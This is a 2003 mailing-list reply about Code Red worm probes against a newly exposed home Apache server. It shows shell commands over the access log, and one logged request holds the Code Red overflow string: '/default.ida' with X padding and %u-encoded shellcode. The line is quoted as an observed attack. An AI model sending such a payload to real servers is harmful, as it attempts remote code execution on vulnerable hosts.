On Mon, 2003-06-23 at 08:53, Nick Rout wrote:
> I set up external access to my home apache server last night about half
> past midnight. Since than I have had two code red attacks, one from
> China, one from Korea.
>
> The first one was only 5 1/2 hours after setting it up.
Yep, still going strong.
/var/log/apache % head -1 access.log
216.39.48.141 - - [01/Jun/2003:06:44:00 +1200] "GET /robots.txt
HTTP/1.1" 200 46
/var/log/apache % tail -1 access.log
203.236.249.87 - - [23/Jun/2003:09:12:01 +1200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 205
/var/log/apache % grep default.ida access.log | wc -l
584
/var/log/apache %
Rex